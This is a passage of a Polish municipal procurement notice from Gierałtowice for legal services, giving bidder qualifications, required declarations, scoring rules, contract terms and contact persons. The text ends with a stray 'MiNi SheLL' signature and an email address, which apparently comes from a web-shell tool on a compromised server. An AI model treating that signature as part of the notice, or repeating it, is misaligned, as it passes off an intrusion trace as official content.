dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy. Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.<br/>2.4.2.	Dysponuje lub dysponować będzie w trakcie realizacji zamówienia i skieruje do jego realizacji 3 osoby zdolne do wykonania zamówienia, tj. Wykonawca musi wykazać, że dysponuje lub będzie dysponował (3) trzema osobami posiadającymi uprawnienia do wykonywania zawodu adwokata lub radcy prawnego, zgodnie z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze (tekst jednolity: Dz. U. z 2024 r. poz. 1564) lub ustawą z dnia 6 lipca 1982 r. o radcach prawnych (tekst jednolity: Dz. U. z 2024 r. poz. 499), lub prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej (tekst jednolity: Dz. U. z 2020 r. poz. 823).<br/>Każda z tych osób musi legitymować się co najmniej 24-miesięcznym doświadczeniem , zaś osoba wskazana jako osoba wiodąca (zgodnie z rozdz. XIX. pkt. 2.2.2. SWZ) musi się legitymować co najmniej 36-miesięcznym doświadczeniem ( w zakresie obsługi prawnej jednostki samorządu terytorialnego).<br/>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły „spełnia - nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach wskazanych w niniejszym ogłoszeniu. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5.	Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w oparciu o złożone podmiotowe środki dowodowe wg metody „spełnia/ nie spełnia”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania - zgodnie z Załącznikiem nr 2 do SWZ, (oświadczenie składa się pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym); Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>2.	Oświadczenie wykonawcy ( oraz Podmiotu udostępniającego zasoby – jeżeli występuje), <br/>w zakresie braku wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainie oraz służących ochronie bezpieczeństwa narodowego - załącznik nr 11 do SWZ.<br/>3.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>4.1.	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, (ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu), albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, (oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu) niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ, (oświadczenie składa się pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania - zgodnie z Załącznikiem nr 2 do SWZ, (oświadczenie składa się pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym); Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>2. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>2.1. Wykaz usług określonych w SWZ, porównywalnych z usługami stanowiącymi przedmiot zamówienia, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich czterech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane oraz z załączeniem dowodów określających, czy te usługi zostały wykonane należycie. Dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - załącznik nr 5 do SWZ; <br/>2.2. Wykaz osób określonych w SWZ, skierowanych przez wykonawcę do realizacji zamówienia , w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych , uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,– załącznik nr 5a do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający wymaga złożenia przedmiotowych środków dowodowych w zakresie oceny doświadczenia Wykonawcy w związku z kryterium oceny ofert:„Doświadczenie osoby wiodącej (radcy prawnego/adwokata) który będzie wykonywał zamówienie)”.2.2.1.W kryterium „doświadczenie osoby wiodącej (radcy prawnego/adwokata)który będzie wykonywał zamówienie”oferta może uzyskać maksymalnie60 punktów.2.2.2.W ramach kryterium „doświadczenie osoby wiodącej (radcy prawnego/adwokata,który będzie wykonywał zamówienie” ocenie podlegać będzie:a)doświadczenie wskazanej osoby w prowadzeniu obsługi prawnej co najmniej jednej gminy(lub innej jednostki samorządu terytorialnego)w zakr.obsługi prawnej co najmniej 2 wydziałów lub referatów w zakr.merytorycznym odpowiadającym zakr.zadań referatów/wydziałów lub samodzielnych stanowisk wskazanych w Rozdziale IVnn.SWZ (w okr.ostatnich 3lat)przez:-minimum11miesięcy:15 pkt.-powyżej 11miesięcy:20 pkt-powyżej24 miesięcy30 pkt Maksymalna liczba punktów do zdobycia w tej pozycji:30pkt.Przez zwrot„w okr.ostatnich3 lat”użyty powyżej Zam.rozumie w okr.ostatnich3lat przed upływem terminu składania ofert)b)wykazanie się przez Wyk.doświadczeniem w zakr.ilości gmin(lub innych jednostek samorządu terytorialnego),na rzecz których świadczono pomoc prawną(bądź jest ona nadal świadczona)w zakr.obsługi prawnej co najmniej jednego z wydziałów lub referatów lub samodzielnych stanowisk urzędu gminy (lub innej jednostki samorządu terytorialnego w zakr.merytorycznym odpowiadającym zakresowi zadań referatów lub samodzielnych stanowisk wskazanych w punkcie IVnn.SWZ (w okr.ostatniego roku):-1gmina(lub inna jednostki samorządu terytorialnego):10pkt-każda następna gmina(lub inna jednostka samorządu terytorialnego):20 pkt.Punkty przyznaje się za prowadzenie obsługi prawnej w opisanym powyżej zakresie w każdej wykazanej gminie (lub innej jednostki samorządu terytorialnego).Maksymalna liczba punktów do zdobycia w tej pozycji:30 pkt.Przez zwrot „okres ostatniego roku” użyty powyżej Zam.rozumie rok kalendarzowy 2024.2.2.3.Wyk.na potwierdzenie spełnienia kryterium–Doświadczenie osoby wiodącej(radcy prawnego/adwokata)który będzie wykonywał zamówienie)–składa wykaz doświadczenia ww.radcy prawnego–wiodącegona (załączniku nr8 doSWZ/zał.nr1do formularza oferty)wraz z referencjami bądź innymi dokumentami z których jednoznacznie będzie wynikało,że usługa została wykonana należycie i była wykonana przez wskazanego radcę prawnego wiodącego.2.2.4.Maksymalna ilość punktowanych usług wskazanego radcy prawnego w powyższym kryterium wynosi 60pkt.2.4.1.W sytuacji:nie złożenia wykazu(zał.nr 8do SWZ),nie złożenia dokumentów potwierdzających realizację usługi (np.referencji,.)nie wskazania żadnego zadania spełniającego wymagania,złożenia tylko swojego osobistego oświadczenia o pełnieniu funkcji radcy prawnego bez potwierdzenia tego dowodami,nie wskazania żadnego zadania spełniającego wymagania,nie wskazania imienia i nazwiska osoby wskazanej do pełnienia funkcji radcy prawnego lub wskazanie innej osoby niż w formularzu oferty,oferta wyk.w ramach kryterium oceny ofert„Doświadczenie radcy prawnego-wiodącego”otrzyma 0pkt.2.4.2.Zam.nie będzie uzupełniał dokumentów na potwierdzenie doświadczenia w ramach kryterium oceny ofert (tj.przedmiotowych środków dowodowych).2.4.3.Wskazany radca prawny wiodący będzie realizował obsługę prawną w trakcie realizacji zadania.2.4.4.Zamawiający dopuszcza zmianę radcy prawnego w przypadku udokumentowania przez Wyk.,że nowy zamienny radca prawny będzie posiadał takie same doświadczenie,które było punktowane w kryterium oceny ofert:„Doświadczenie osoby wiodącej(radcy prawnego/adwokata)który będzie wykonywał zamówienie)”,w ramach którego Wyk.uzyskał punkty.2.4.5.W przypadku powierzenia obowiązków radcy prawnego innej osobie bez zgody Zam.,która nie udokumentuje wymaganego doświadczenia,za które Wyk.uzyskał punkty w ramach niniejszego kryterium oceny ofert Zam.będzie uprawniony do odstąpienia od umowy zgodnie z zapisami w projekcie umowy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3.Ofertę składa się na Formularzu Ofertowym-zgodnie z Zał.nr 1 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>Wraz z formularzem oferty należy złożyć:3.1.Oświadczenie wstępne na podstawie art.125 ust.1 Pzp. o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania ( zał.nr 2 do SWZ oraz w sytuacji opisanej w SWZ również zał.2a, 2b, 3 do SWZ),<br/>3.2.Oświadczenie, o którym mowa w art.125 ust. 1PZP Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia, sporządzone na podstawie Zał.nr 2 do SWZ oraz podpisane przez osoby upoważnione do reprezentacji.3.3.Oświadczenie,o którym mowa w art.125 ust. 1 Pzp. Podmiotu udostępniającego zasoby, sporządzone na podstawie Zał.nr 2a do SWZ oraz podpisane przez osoby upoważnione do reprezentacji ( jeżeli dotyczy).3.4.Oświadczenie, o którym mowa w art.125 ust.1 PZP Podwykonawcy niebędącego podmiotem udostępniającym zasoby, sporządzone na podstawie Zał.nr 2 b do SWZ oraz podpisane przez osoby upoważnione do reprezentacji (jeżeli dotyczy).3.5.Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych (KRS, CEIDG).3.6.Odpis lub informację z KRS,CEIDG lub innego właściwego rejestru,dot.Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia,Podmiotu udostępniającego zasoby, Podwykonawcy,w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania–zg.z zapisami SWZ.3.7.Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.3.8.Zobowiązanie podmiotów udostępniających zasoby i/lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, wymagane postanowieniami Rozdziału XI SWZ, w przypadku, gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu.Wzór zobowiązania podmiotu udostępniającego zasoby stanowi Zał.nr3 do SWZ.3.9.Oświadczenie, o którym mowa w art.117 ust. 4 PZP,Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w zakresie określonym w Rozdz. XII pkt 3 SWZ, z którego wynika, które usługi wykonają poszczególni Wykonawcy.Wzór oświadczenia stanowi Zał.nr 9 do SWZ..10. Ewentualne zastrzeżone informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji-wraz z uzasadnieniem–zgodnie zRozdz.10 ust. 2 pkt 3) SWZ.(Wykonawca nie może zastrzec informacji, o których mowa w art. 222ust. 5 PZP).3.11.Wykaz informacji podlegającej ocenie punktowej(załącznik nr 8 do SWZ wraz z załącznikami)tj. przedmiotowe środki dowodowe w zakresie w jakim zostały opisane w rozdziale XIX niniejszej SWZ dotyczące kryteriów oceny ofert.3.12.Oświadczenie wykonawcy(oraz podmiotu udzielającego zasoby–jeżeli występuje),w zakresie braku wykluczenia z postępowania na podstawie art.7 ust.1ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainie oraz służących ochronie bezpieczeństwa narodowego-zał. nr 11 do SWZ. Oferta wraz z zał. powinna być podpisana elektronicznie przez osobę upoważn.do reprezent.Wyk.,zgod.z formą reprez.Wyk.określ.w rejestrze lub innym dokumencie,właściwym dla danej formy organizacyjnej Wyk.albo przez upełn.przedst.Wyk.W celupotwierdzenia,że osoba działająca w imieniu wyk.jest umocowana do jego reprezentowania,zam.żąda od wyk.odpisu lub inf.z KRS,CEiDG lub innego właściwego rejestru.5.Ofertę należy złożyć poprzez Platformę zgod.z zapisami w SWZ w rozdz.XVIII.6.Oterminie złożenia oferty decyduje czas pełnego przeprocesowania transakcji na Platformie.System nie zaakceptuje oferty złożonej po terminie składania ofert. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty w wyodrębnionym pliku. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku gdy pełnomocnictwo zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenie zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej może dokonać mocodawca ( osoba/ osoby wystawiające pełnomocnictwo ) lub notariusz. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (załącznik nr 9 do SWZ).<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. (oświadczenie i dokumenty składa się pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej, opatrzone podpisem zaufanym lub podpisem osobistym);<br/>5.	Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa wraz z ofertą: Oświadczenie wykonawcy, w zakresie braku wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainie oraz służących ochronie bezpieczeństwa narodowego - załącznik nr 11 do SWZ (składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ROZWIĄZANIE UMOWY, ZMIANA I ODSTĄPIENIE OD UMOWY<br/>1.	Zamawiający może natychmiast rozwiązać umowę:<br/>a.	jeżeli Wykonawca pomimo uprzednio pisemnego 1-krotnego zastrzeżenia ze strony Zamawiającego nie wykonuje usługi zgodnie z umową lub uporczywie albo w rażący sposób zaniedbuje zobowiązania umowne,<br/>b.	gdy Wykonawca nie wywiązuje się lub nienależycie wykonuje swoje obowiązki umowne,<br/>c.	wszczęcia postępowania likwidacyjnego Wykonawcy,<br/>d.	Wykonawca utracił uprawnienia zawodowe,<br/>e.	zostanie wydany nakaz zajęcia majątku Wykonawcy w stopniu uniemożliwiającym wykonanie przedmiotu niniejszej umowy,<br/>f.	Jeżeli Wykonawca dokona zmiany Radcy Prawnego -Wiodącego z naruszeniem postanowień zawartych w Specyfikacji Warunków Zamówienia.<br/>2.	Ponadto Zamawiający może rozwiązać umowę, w trybie natychmiastowym w przypadkach wyszczególnionych w art. 456 ust. 1 pkt 2 ustawy Prawo zamówień publicznych. Rozwiązanie umowy należy uzasadnić na piśmie. <br/>3.	Zamawiającemu przysługuje prawo odstąpienia od umowy z przyczyn wskazanych w przepisach kodeksu cywilnego, a także:<br/>a.	w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonywanie umowy może zagrozić podstawowemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu; Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.<br/>4.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku:<br/>4.1.	Zmiany obowiązującej stawki podatku VAT, wówczas wynagrodzenie netto przysługujące Wykonawcy pozostanie bez zmian a podatek VAT zostanie dostosowany do obowiązujących przepisów.<br/>4.2.	Zgłoszenia zmiany osoby pełniącej funkcję Radcy prawnego, w tym radcy prawnego -wiodącego. Proponowana osoba musi spełniać wymagania opisane w SWZ. W przypadku zmiany radcy prawnego –wiodącego z zastrzeżeniem, że nowy zamienny radca prawny będzie posiadał takie same doświadczenie, które było punktowane w kryterium oceny ofert: „Doświadczenie osoby wiodącej (radcy prawnego/ adwokata) który będzie wykonywał zamówienie)”, w ramach którego Wykonawca uzyskał punkty.<br/>4.3.	Konieczności wprowadzenia zmian nieistotnych nie mających wpływu na realizację niniejszej umowy np., związanych ze sposobem finansowania w zakresie budżetowym Zamawiającego, zmian numerów kont, wprowadzenia zmian organizacyjnych Zamawiającego i Wykonawcy.<br/>5.	Zmiana umowy może także nastąpić w przypadkach, przewidzianych wprost w ustawie Prawo zamówień publicznych.<br/>6.	Bez zgody Zamawiającego, wyrażonej na piśmie, nie można przenieść na osoby trzecie wierzytelności wynikających z niniejszej umowy, w tym odszkodowawczych i odsetkowych.<br/>7.	Wszelkie zmiany postanowień niniejszej umowy mogą być dokonywane w formie pisemnej pod rygorem nieważności i mogą być dokonywane tylko za zgodą obydwu stron.<br/>8.	W przypadku rozwiązania umowy przekazanie dokumentów oraz spraw w toku nastąpi na podstawie protokołu zdawczo-odbiorczego podpisanego przez Wykonawcę oraz kierownika referatu merytorycznego.<br/>9. Zasady wprowadzania zmian ze względu na waloryzację opisano szczegółowo w projekcie umowy.<br/>10. Wzór umowy stanowi zał.nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-12 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy prowadzonego postępowania. adres: https://gieraltowice.ezamawiajacy.pl/pn/gieraltowice/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-12 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Osobami uprawnionymi do porozumiewania się z Wykonawcami są:<br/>1.1. w zakresie proceduralnym:<br/>Danuta Kozik, tel. (032) 30-11-340; zp@gieraltowice.pl<br/>Bogumiła Macha zp@gieraltowice.pl<br/><br/>1.2. w zakresie merytorycznym:<br/>Danuta Kozik tel. (032) 30-11-340; zp@gieraltowice.pl<br/>Marta Bruniany tel. (032) 30-11-390

Creat By MiNi SheLL
Email: jattceo@gmail.com